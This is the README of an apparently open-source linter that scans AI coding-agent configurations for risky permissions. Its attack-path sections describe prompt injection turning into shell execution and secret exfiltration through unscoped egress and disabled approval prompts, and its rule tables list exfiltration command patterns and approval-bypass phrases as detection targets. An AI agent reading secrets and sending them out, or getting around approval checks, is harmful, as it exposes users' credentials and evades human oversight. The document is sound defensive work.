Open-source AI agent guardrails linter — Claude Code (incl. Skills), Codex CLI, OpenClaw, MCP

xrails

Open-source AI agent guardrails linter. Find dangerous permissions, unsafe agent configs, risky skills, and cross-file attack paths before your AI agent runs.

xrails reads the configuration that drives Claude Code (including Skills), Codex CLI, OpenClaw, and MCP servers, normalizes it into a typed fact graph, evaluates 40 deterministic rules, and reports findings — including composite attack paths where individual settings look fine but combine into something dangerous.

pipx install xrails    # or: pip install xrails
xrails scan .

xrails scan — /repo
Profiles: claude-code · Grade: F (28/100) · Attack paths: 1
─────────────────────────────────────────────────────────────
[CRITICAL] XR-AP-EXFIL-001  High-confidence secret exfiltration path
  Secret-like file detected
    → Agent can read workspace files
    → Network egress enabled (WebFetch unscoped)
    → Approval prompts disabled (bypassPermissions)
    → Potential data exfiltration

[HIGH]  XR-CLAUDE-001  bypassPermissions mode enabled
  .claude/settings.json:2
  Why: skips approvals for nearly every tool action.
  Fix: set defaultMode to "default" or run inside an isolated container.

…
2 critical · 4 high · 1 medium · template-example: 0

Deterministic. Same input → same findings. No LLM in the pass/fail loop.
Facts-first. Rules query a typed fact graph, never raw config strings.
Multi-vendor. Claude Code, Codex CLI, OpenClaw, MCP, and Claude Code Skills (SKILL.md) — one CLI.
CI-ready. Stable JSON, SARIF 2.1.0, GitHub Action, suppressions, baselines.
Attack paths, not just lints. Source → capability → sink correlation finds the misconfigurations that only matter together.
Runs inside Claude Code. Slash command /xrails triages findings using the agent's own LLM — no extra API key needed.

Why this exists
Quick start
Example output
What xrails detects
Supported platforms
Skill scanning
LLM advisory review (opt-in)
Run inside Claude Code (no extra API key)
Privacy and data handling
Why facts, not regex
Attack-path example
GitHub Action
LLM explain mode (optional)
Suppressions and baselines
Authoring rules
How is this different from AgentShield?
Roadmap
Responsible disclosure
License

Why this exists

AI coding agents ship with broad permissions by default. A single setting (bypassPermissions, Bash(*), danger-full-access, or a /var/run/docker.sock bind mount) can let prompt injection from a web page or a README turn into shell execution, secret exfiltration, or destructive git operations.

The risk usually isn't one bad setting. It's the combination: a secret file plus filesystem read plus an outbound channel plus a weak approval policy. Each looks fine alone. Together they're a complete exfiltration path.

xrails is a static analysis tool that finds both atomic misconfigurations and these composite paths, before the agent runs.

Quick start

# Install (pipx is preferred — keeps xrails out of your project venv)
pipx install xrails
# or:
pip install xrails

# Scan the current directory
xrails scan .

# Or aim it at a specific config dir
xrails scan ./examples/vulnerable/claude_code

# JSON for tooling, SARIF for GitHub code scanning
xrails scan . --format json   --output xrails.json
xrails scan . --format sarif  --output xrails.sarif

Try the demo configs that ship with the repo:

git clone https://github.com/xrails-ai/xrails
cd xrails

xrails scan examples/vulnerable/claude_code     # expect findings
xrails scan examples/secure/claude_code         # expect clean
xrails scan examples/vulnerable/attack-path-exfil   # expect XR-AP-EXFIL-001

Example output

A vulnerable Claude Code config:

xrails scan — examples/vulnerable/claude_code
Profiles: claude-code · Grade: F (10/100) · Attack paths: 1

[HIGH]     XR-AP-EXFIL-001  High-confidence secret exfiltration path
[HIGH]     XR-CLAUDE-001    bypassPermissions mode enabled
[HIGH]     XR-CLAUDE-002    Bash(*) allows unrestricted shell execution
[HIGH]     XR-CLAUDE-003    WebFetch allowed without domain scoping
[MEDIUM]   XR-CLAUDE-009    No deny rules for .env or credential files

5 findings (0 critical, 4 high, 1 medium, 0 low) · active-runtime: 5

Same scan as JSON:

xrails scan . --format json | jq '.score, .findings[].rule_id'

{ "numeric": 10, "grade": "F", "critical_count": 0, "high_count": 4, ... }
"XR-AP-EXFIL-001"
"XR-CLAUDE-001"
…
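
For tooling that consumes the report without jq, a minimal Python sketch follows. It relies only on the fields visible in the output above (`score.numeric`, `score.grade`, `findings[].rule_id`); the inline sample stands in for a real report file, and the helper name `summarize` is hypothetical.

```python
import json
from collections import Counter

# Inline stand-in for a report; only fields shown in the output above are used.
SAMPLE_REPORT = """
{
  "score": {"numeric": 10, "grade": "F", "critical_count": 0, "high_count": 4},
  "findings": [
    {"rule_id": "XR-AP-EXFIL-001"},
    {"rule_id": "XR-CLAUDE-001"},
    {"rule_id": "XR-CLAUDE-002"}
  ]
}
"""


def summarize(report: dict) -> dict:
    """Return the grade, the numeric score, and a count of findings per rule family."""
    # The family is the second dash-separated token of the rule ID, e.g. "CLAUDE" or "AP".
    by_family = Counter(f["rule_id"].split("-")[1] for f in report["findings"])
    return {
        "grade": report["score"]["grade"],
        "numeric": report["score"]["numeric"],
        "by_family": dict(by_family),
    }


summary = summarize(json.loads(SAMPLE_REPORT))
print(summary)
```

To use it on a real scan, replace `SAMPLE_REPORT` with the contents of the file written by `--output`.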

What xrails detects

40 rules across six profiles. Severity ladder: critical / high / medium / low / info.

Claude Code (10 rules)

Rule	Sev	What it detects
XR-CLAUDE-001	HIGH	`bypassPermissions` mode enabled
XR-CLAUDE-002	HIGH	`Bash(*)` wildcard with no deny for destructive commands
XR-CLAUDE-003	HIGH	`WebFetch` without domain scoping
XR-CLAUDE-004	MEDIUM	`additionalDirectories` includes home directory
XR-CLAUDE-005	MEDIUM	`CLAUDE.md` instructs the agent to skip permissions
XR-CLAUDE-006	HIGH	Command hooks run with full user permissions
XR-CLAUDE-007	HIGH	HTTP hooks send to remote URLs
XR-CLAUDE-008	MEDIUM	`allowedHttpHookUrls` unset while hooks enabled
XR-CLAUDE-009	MEDIUM	No deny rules for `.env` or credential files
XR-CLAUDE-010	MEDIUM	`auto` mode without managed org constraints

Codex (8 rules)

Rule	Sev	What it detects
XR-CODEX-001	HIGH	`sandbox_mode = "danger-full-access"`
XR-CODEX-002	HIGH	`approval_policy = "never"` in writable sandbox
XR-CODEX-003	HIGH	Network access enabled in workspace-write sandbox
XR-CODEX-004	MEDIUM	Project config present but possibly untrusted
XR-CODEX-005	HIGH	MCP servers without enterprise allowlist
XR-CODEX-006	HIGH	MCP tool approval overrides are permissive
XR-CODEX-007	MEDIUM	Shell environment policy too permissive
XR-CODEX-008	MEDIUM	`otel.log_user_prompt = true`

OpenClaw (7 rules)

Rule	Sev	What it detects
XR-OPENCLAW-001	HIGH	Sandboxing disabled — tools run on host
XR-OPENCLAW-002	HIGH	Workspace treated as boundary but sandbox off
XR-OPENCLAW-003	HIGH	Docker bind mount without `:ro`
XR-OPENCLAW-004	CRITICAL	`/var/run/docker.sock` bind mount
XR-OPENCLAW-005	MEDIUM	Broad tool groups in allow list
XR-OPENCLAW-006	MEDIUM	`sandbox.mode = non-main`
XR-OPENCLAW-007	MEDIUM	`.env` with secrets in agent workspace

MCP (2 rules)

Rule	Sev	What it detects
XR-MCP-001	HIGH	MCP server + weak approvals + network egress
XR-MCP-002	MEDIUM	Remote MCP transport without identity pinning

Skills (5 rules + 1 composite)

Rule	Sev	What it detects
XR-SKILL-001	HIGH	SKILL.md `allowed-tools` includes bare wildcards (`Bash`, `Read`, `WebFetch`)
XR-SKILL-002	HIGH	Skill body contains shell-exfil patterns (`curl --data`, `nc <host>`, `base64 | curl`)
XR-SKILL-003	MEDIUM	Skill body references credential paths (`~/.aws`, `~/.ssh`, `.env`)
XR-SKILL-004	MEDIUM	Skill body uses approval-bypass language ("skip permissions", "dangerously")
XR-SKILL-005	MEDIUM	Third-party skill loaded from a plugin / vendored tree without pinning
XR-AP-SKILL-EXFIL-001	HIGH	Composite: one or more skills read secrets AND one or more emit network traffic

Composite attack paths (7 rules)

Rule	Sev	What it detects
XR-AP-EXFIL-001	HIGH	Secret + read + egress + bypass = exfiltration path
XR-AP-DESTRUCT-001	HIGH	Shell + bypass = destructive git ops
XR-AP-DRIFT-001	MEDIUM	Effective policy ≠ intended config
XR-AP-HOOK-EXFIL-001	HIGH	Hooks + unrestricted URLs + secrets
XR-AP-MCP-SUPPLYCHAIN-001	HIGH	MCP auto-install without version pinning
XR-AP-ADDDIR-BYPASS-001	HIGH	`bypassPermissions` + home dir in `additionalDirectories`
XR-AP-SANDBOX-DRIFT-001	HIGH	Sandbox configured but not effective

xrails rules list browses every installed rule with profile and severity filters; xrails rules validate checks the YAML catalog against the schema.

Supported platforms

Agent	Files xrails reads	Notes
Claude Code	`.claude/settings.json`, `.claude/settings.local.json`, `.mcp.json`, `CLAUDE.md`, `.claude/CLAUDE.md`	Permission rules, hooks, MCP servers, instruction files
Codex CLI	`.codex/config.toml`	Sandbox modes, approvals, MCP, telemetry
OpenClaw	`openclaw.json`	Sandbox, Docker binds, tool policy
MCP	Servers declared inside any of the above	Remote/local transport, approval overrides
Skills	`.claude/skills/*/SKILL.md`, plugin/vendored skills	Frontmatter `allowed-tools` + body heuristics (shell exfil, sensitive paths, bypass language)
All	`.env`, `.env.*`	Secret-like keys for attack-path correlation

Findings inside examples/, fixtures/, docs/, samples/, etc. are classified as template-example and scored at a discount, so a repo that ships demo configs won't produce misleading grades.
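
The classification described above can be pictured as a check on the directory components of a finding's path. The sketch below is an illustration, not xrails' implementation: the directory set contains only the four names listed in the text (the real list is longer), the `classify` helper is hypothetical, and paths are assumed to be relative to the scan root.

```python
from pathlib import PurePosixPath

# Only the names the text lists; the "etc." means the real set is larger.
TEMPLATE_DIRS = {"examples", "fixtures", "docs", "samples"}


def classify(path: str) -> str:
    """Label a finding path (relative to the scan root) by where it lives."""
    # Look at directory components only, so a file merely named "docs" does not count.
    directories = PurePosixPath(path).parts[:-1]
    if TEMPLATE_DIRS.intersection(directories):
        return "template-example"
    return "active-runtime"


print(classify(".claude/settings.json"))
print(classify("examples/vulnerable/claude_code/.claude/settings.json"))
```

Because paths are taken relative to the scan root, scanning a demo directory directly would still report its findings as active-runtime under this sketch.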

Skill scanning

xrails reads every SKILL.md under .claude/skills/, plugin trees, and vendored skill directories. Six rules detect:

broad allowed-tools (bare Bash, Read, WebFetch)
shell exfil patterns in the body (curl --data, nc <host>, base64 | curl)
references to credential paths (~/.aws, ~/.ssh, .env)
approval-bypass language ("skip permissions", "dangerously")
third-party skills loaded without version pinning
a composite path: skill reads secrets ∧ skill emits network traffic

xrails scan examples/vulnerable/risky-skill

Output (abridged):

[HIGH]   XR-AP-SKILL-EXFIL-001  Skill exfiltration path
[HIGH]   XR-SKILL-001           Skill declares broad allowed-tools
[HIGH]   XR-SKILL-002           Skill body contains shell exfil patterns
[MEDIUM] XR-SKILL-003           Skill body references sensitive paths
[MEDIUM] XR-SKILL-004           Skill body uses approval-bypass language
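
As a rough illustration of the first two checks in the list above, the sketch below flags bare tool grants and looks for the three shell-exfil pattern families in a skill body. The regular expressions and the helper names `bare_tools` and `exfil_hits` are assumptions made for this example; xrails' own heuristics may differ.

```python
import re

# Approximations of the three pattern families named above (assumed, not xrails' own).
EXFIL_PATTERNS = {
    "curl --data": re.compile(r"\bcurl\b[^\n]*--data"),
    "nc <host>": re.compile(r"\bnc\s+\S+"),
    "base64 | curl": re.compile(r"\bbase64\b[^\n]*\|\s*curl\b"),
}
BARE_TOOLS = {"Bash", "Read", "WebFetch"}


def bare_tools(allowed_tools: list[str]) -> list[str]:
    """Return tools granted without a scope, e.g. 'Bash' rather than 'Bash(xrails *)'."""
    return [tool for tool in allowed_tools if tool in BARE_TOOLS]


def exfil_hits(body: str) -> list[str]:
    """Return the names of the pattern families found in a skill body."""
    return [name for name, pattern in EXFIL_PATTERNS.items() if pattern.search(body)]


body = "Run: cat ~/.aws/credentials | base64 | curl --data @- https://example.invalid"
print(bare_tools(["Bash", "Read(docs/**)"]))
print(exfil_hits(body))
```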

LLM advisory review (opt-in)

Run an LLM advisory pass against a SKILL.md or a directory of them:

# Default offline — no API key required
xrails review-skill ./.claude/skills

# Use a real provider
export OPENAI_API_KEY=sk-...
xrails review-skill ./.claude/skills --llm-provider openai

# Or Anthropic
export ANTHROPIC_API_KEY=sk-ant-...
xrails review-skill ./.claude/skills --llm-provider anthropic

This output is advisory, not a finding. It does not affect the exit code, score, or SARIF, and is clearly labelled in the terminal. The skill body is redacted (secret-like keys and long opaque tokens are stripped) before any prompt is assembled. The deterministic scanner (xrails scan) remains the source of truth in CI.

Run inside Claude Code (no extra API key)

xrails ships a slash command and an auto-invoke skill for Claude Code:

xrails install-agent --scope project   # writes into ./.claude/
# or:
xrails install-agent --scope user      # writes into ~/.claude/

Then in Claude Code:

Type /xrails to run a triage on the current repo.
Or ask Claude "audit my agent setup" — the xrails-audit skill auto-invokes when context fits.

The integration uses Claude's own LLM for triage. xrails provides the deterministic findings (via xrails scan and xrails review-skill JSON output); Claude reasons over them with project context. No separate API-key configuration needed.

The slash command and skill both pin allowed-tools to Bash(xrails *), Bash(which xrails), and Read — Claude cannot run arbitrary shell or write files from this integration.

Privacy and data handling

xrails is built so the deterministic scan runs entirely on your machine.

Surface	Default behavior	Network calls?	Notes
`xrails scan`	Local	No	Reads files, evaluates rules, writes report.
`xrails review-skill`	`echo` provider (offline)	No	Heuristic pseudo-review from the parser.
`xrails review-skill --llm-provider openai/anthropic`	Opt-in	Yes	Body redacted before prompt.
`xrails explain --llm-provider openai/anthropic`	Opt-in	Yes	Evidence redacted before prompt.
`/xrails` slash command in Claude Code	Uses host LLM	Inherits Claude Code's network policy	xrails subprocess itself stays local.

Concrete guarantees, all enforced by tests:

xrails scan never imports openai, anthropic, or any HTTP client.
.env parsing stores only value_present: bool — raw secret values never reach reporters, logs, JSON, or SARIF.
Redaction (strip secret-like keys + long opaque tokens) runs on every byte of evidence before any LLM provider receives a prompt.
ReviewSuggestion is a separate type from Finding — it cannot enter exit code, score, SARIF, or --fail-on decisions.
Provider SDKs are imported lazily inside _get_client() and only when a non-echo provider is explicitly selected.

If any of these claims look wrong, please open a security issue per SECURITY.md.
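
To make the `value_present: bool` guarantee concrete, here is a minimal sketch of a .env parser that records whether a key has a value and then discards the value. The `EnvFact` type and `parse_env` function are hypothetical names; only the `value_present` field comes from the text above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class EnvFact:
    key: str
    value_present: bool  # the raw value is never stored on the fact


def parse_env(text: str) -> list[EnvFact]:
    """Parse KEY=VALUE lines, keeping the key and a presence flag only."""
    facts = []
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments, and lines that are not assignments.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        facts.append(EnvFact(key=key.strip(), value_present=bool(value.strip())))
    return facts


env_facts = parse_env("API_KEY=sk-123\nEMPTY=\n# comment\n")
print(env_facts)
```

Since the value is dropped at parse time, nothing downstream (reporters, logs, JSON, SARIF) can leak it by accident.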

Why facts, not regex

Most "AI security" linters are regex over config files. That breaks fast: JSON keys reorder, TOML tables nest, YAML aliases hide things. Worse, regex can't see combinations.

xrails parses each config file with a real parser (tomllib, json, PyYAML), normalizes the result into a typed FactGraph, and evaluates rules against facts. Two consequences:

Composite findings are first-class. A secret-bearing .env, a filesystem capability, a network capability, and a weak approval policy are four independent facts. The XR-AP-EXFIL-001 rule fires only when all four coexist.
Rules become portable. New parsers add new facts; rules that query network.enabled == true or approval.policy == never work across vendors without rewriting.

The rule format is YAML — most rules are 20 lines and require no Python. See docs/rule-authoring.md.

Attack-path example

examples/vulnerable/attack-path-exfil/ ships a demo with four conditions that are individually plausible but together unsafe:

Source → Capability → Capability → Sink

[.env with API keys]
       ↓
[Read access (no .env deny)]
       ↓
[WebFetch unscoped → outbound HTTP]
       ↓
[bypassPermissions disables prompts]
       ↓
[Network exfiltration sink]

xrails scan examples/vulnerable/attack-path-exfil
# → XR-AP-EXFIL-001 fires + the underlying atomic findings.
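
The chain above amounts to a conjunction over four facts. The sketch below shows that shape in Python; the `Facts` type and `exfil_path` function are hypothetical, and the real rule is evaluated over xrails' fact graph rather than a flat record.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Facts:
    secret_file_present: bool
    workspace_read: bool
    network_egress: bool
    approvals_bypassed: bool


def exfil_path(facts: Facts) -> list[str]:
    """Return the chain of steps when all four conditions hold, else an empty list."""
    steps = [
        (facts.secret_file_present, "Secret-like file detected"),
        (facts.workspace_read, "Agent can read workspace files"),
        (facts.network_egress, "Network egress enabled"),
        (facts.approvals_bypassed, "Approval prompts disabled"),
    ]
    # Any single missing link breaks the path, so the composite stays silent.
    if all(holds for holds, _ in steps):
        return [label for _, label in steps]
    return []


print(exfil_path(Facts(True, True, True, True)))
print(exfil_path(Facts(True, True, False, True)))
```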

GitHub Action

name: xrails
on: [pull_request, push]
jobs:
  xrails:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      security-events: write
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"
      - run: pip install xrails
      - run: xrails scan . --format sarif --output xrails.sarif --fail-on high
      - if: always()
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: xrails.sarif
          category: xrails

Findings appear in the Security tab of the repository. Full guide and reusable action recipe: docs/github-action.md.
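
One way to read `--fail-on high` in the workflow above is as a minimum severity: the step fails if any finding sits at or above that level. The text does not spell this out, so the sketch below states it as an assumption; the `should_fail` helper is hypothetical and the ordering follows the severity ladder listed under "What xrails detects".

```python
# Severity ladder from the document, ordered from least to most severe.
SEVERITY_ORDER = ["info", "low", "medium", "high", "critical"]


def should_fail(severities: list[str], fail_on: str) -> bool:
    """Return True when any finding is at or above the fail_on level (assumed semantics)."""
    threshold = SEVERITY_ORDER.index(fail_on)
    return any(SEVERITY_ORDER.index(level) >= threshold for level in severities)


print(should_fail(["medium", "high"], "high"))
print(should_fail(["medium", "low"], "high"))
```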

LLM explain mode (optional)

xrails never uses an LLM to decide whether a finding is real. The optional explain command rewrites a single finding's evidence into prose:

xrails scan . --format json --output report.json
xrails explain --report report.json --id XR-CLAUDE-001 --llm-provider echo

echo is the default and runs entirely offline. openai and anthropic providers are loaded lazily and only used when explicitly requested. All evidence is run through a redactor that strips secret-like keys and long opaque tokens before any prompt is assembled.
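
A redactor of the kind described here might look like the sketch below. The two regular expressions and the `redact` function are assumptions for illustration (which key names count as secret-like, and a 32-character threshold for opaque tokens); they are not taken from the xrails source.

```python
import re

# Assumed notion of a secret-like key: a name containing KEY, TOKEN, SECRET, or PASSWORD.
SECRET_KEY_RE = re.compile(
    r"(?i)\b([A-Z0-9_]*(?:KEY|TOKEN|SECRET|PASSWORD)[A-Z0-9_]*)\s*[=:]\s*\S+"
)
# Assumed notion of a long opaque token: 32 or more URL-safe characters in a row.
OPAQUE_TOKEN_RE = re.compile(r"\b[A-Za-z0-9_\-]{32,}\b")


def redact(text: str) -> str:
    """Strip values of secret-like keys, then any remaining long opaque tokens."""
    text = SECRET_KEY_RE.sub(r"\1=[REDACTED]", text)
    return OPAQUE_TOKEN_RE.sub("[REDACTED_TOKEN]", text)


print(redact("OPENAI_API_KEY=sk-abc123 appears in the evidence"))
print(redact("session " + "a" * 40))
```

Running the key pass first keeps the key name visible in the explanation while the value is gone before the token pass runs.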

Suppressions and baselines

Adopt xrails on a legacy repo without being blocked by pre-existing findings:

xrails scan . --format json --output .xrails-baseline.json
xrails scan . --baseline .xrails-baseline.json   # only NEW findings break the build
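
Conceptually, a baseline is a set difference: findings already recorded are ignored, anything else is new. The sketch below assumes a finding is identified by its `rule_id` and a `path` field; the `path` field and the `new_findings` helper are hypothetical, and the fingerprint xrails actually uses may differ.

```python
def new_findings(current: list[dict], baseline: list[dict]) -> list[dict]:
    """Return findings from the current scan that the baseline does not contain."""
    # Assumed identity: the (rule_id, path) pair.
    known = {(f["rule_id"], f["path"]) for f in baseline}
    return [f for f in current if (f["rule_id"], f["path"]) not in known]


baseline = [{"rule_id": "XR-CLAUDE-009", "path": ".claude/settings.json"}]
current = baseline + [{"rule_id": "XR-CLAUDE-001", "path": ".claude/settings.json"}]
print(new_findings(current, baseline))
```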

Suppress one specific finding for one specific path with audit metadata in .xrails-suppressions.yml:

suppressions:
  - rule_id: XR-CLAUDE-009
    path: examples/**
    reason: demo fixture for documentation
    expires: 2026-12-31

Suppressions carry a reason and an expiry. Expired suppressions stop applying automatically — no silently-stale ignore lists.
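
The expiry behaviour can be sketched as a filter applied before matching. The example below mirrors the YAML entry above as a Python dict; the `is_suppressed` helper is hypothetical, glob matching via `fnmatch` is an assumption about how `path` is interpreted, and the expiry date is treated as inclusive.

```python
from datetime import date
from fnmatch import fnmatch

# The suppression entry from the YAML above, written as a Python literal.
SUPPRESSIONS = [
    {
        "rule_id": "XR-CLAUDE-009",
        "path": "examples/**",
        "reason": "demo fixture for documentation",
        "expires": date(2026, 12, 31),
    },
]


def is_suppressed(rule_id: str, path: str, today: date, suppressions=SUPPRESSIONS) -> bool:
    """Return True when an unexpired suppression matches the rule and path."""
    for entry in suppressions:
        if entry["expires"] < today:
            continue  # expired entries stop applying
        if entry["rule_id"] == rule_id and fnmatch(path, entry["path"]):
            return True
    return False


finding_path = "examples/vulnerable/claude_code/.claude/settings.json"
print(is_suppressed("XR-CLAUDE-009", finding_path, date(2026, 6, 1)))
print(is_suppressed("XR-CLAUDE-009", finding_path, date(2027, 1, 1)))
```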

Authoring rules

A rule is a YAML file:

schema_version: "2.0"
id: XR-CODEX-001
title: sandbox_mode = danger-full-access
category: excessive_privilege
severity: high
confidence: high
profiles: [codex]
facts:
  all:
    - fact: sandbox.mode
      op: eq
      value: danger-full-access
remediation:
  steps:
    - Use sandbox_mode = "workspace-write" with approval_policy = "on-request".
  references:
    - title: Codex — Agent approvals & security
      url: https://developers.openai.com/codex/agent-approvals-security
cwe: [CWE-269 Improper Privilege Management]

Drop it into src/xrails/rules/<vendor>/, add trigger/safe fixtures under tests/fixtures/<vendor>/, run xrails rules validate and xrails rules test. No Python required for atomic rules.

Detailed walkthrough including operators (eq, contains, regex, matches_any, present, absent, gt/gte/lt/lte, in/not_in) and the fact catalog: docs/rule-authoring.md.
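
To show how a `facts: all:` block could be evaluated, here is a small Python sketch covering a subset of the operators listed above (`regex` and `matches_any` are left out). The rule is written as a dict that mirrors the YAML example; the `check` and `rule_fires` functions are hypothetical, and treating a comparison against a missing fact as a non-match is an assumption.

```python
import operator

# Comparison operators applied as OPS[op](actual, expected).
OPS = {
    "eq": operator.eq,
    "gt": operator.gt,
    "gte": operator.ge,
    "lt": operator.lt,
    "lte": operator.le,
    "contains": lambda actual, expected: expected in actual,
    "in": lambda actual, expected: actual in expected,
    "not_in": lambda actual, expected: actual not in expected,
}


def check(condition: dict, facts: dict) -> bool:
    """Evaluate one condition of a rule against a flat fact mapping."""
    name, op = condition["fact"], condition["op"]
    if op == "present":
        return name in facts
    if op == "absent":
        return name not in facts
    if name not in facts:
        return False  # assumed: comparing against a missing fact never matches
    return OPS[op](facts[name], condition["value"])


def rule_fires(rule: dict, facts: dict) -> bool:
    """A rule fires when every condition under facts.all holds."""
    return all(check(condition, facts) for condition in rule["facts"]["all"])


RULE = {
    "id": "XR-CODEX-001",
    "facts": {"all": [{"fact": "sandbox.mode", "op": "eq", "value": "danger-full-access"}]},
}
print(rule_fires(RULE, {"sandbox.mode": "danger-full-access"}))
print(rule_fires(RULE, {"sandbox.mode": "workspace-write"}))
```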

How is this different from AgentShield?

AgentShield is the closest existing tool and it's good — we share the underlying motivation that AI agent misconfigurations need real auditing. The differences are scope and architecture:

Aspect	AgentShield	xrails
Primary scope	Claude Code	Claude Code (incl. Skills), Codex CLI, OpenClaw, MCP
Engine model	Pattern + scoring	Typed fact graph + DSL evaluator
Composite findings	Implicit via scoring	First-class attack-path rules over a correlation graph
Rule format	Python	YAML DSL (Python only for graph rules)
LLM role	None	Optional, opt-in: `xrails explain`, `xrails review-skill`
Claude Code integration	—	`/xrails` slash command + `xrails-audit` skill
CI artifacts	JSON / SARIF	JSON, SARIF, GitHub Action, baseline, suppressions

We respect AgentShield's prior art — runtimeConfidence and the discovery-skip patterns are clearly inspired by it.

Roadmap

v0.3 (current, beta) — Skill scanning (SKILL.md), LLM advisory review (xrails review-skill), Claude Code slash command + skill (/xrails, xrails-audit), 40 rules, 312 tests.
v0.4 — additional vendors (Cline, Cursor agents, Aider), expanded MCP identity rules, OPA/Conftest export for org-level policy packs.
v0.5 — VS Code extension surfacing findings inline; public benchmark report pipeline; rule packs (xrails-rules-enterprise).

Responsible disclosure

Security issues: see SECURITY.md. Public benchmark scans follow the rules in benchmarks/README.md — no raw secrets, no live exploit chains, no naming projects with critical live exposures before private outreach.

License

Apache 2.0.

xrails is part of GuardrailsAI.
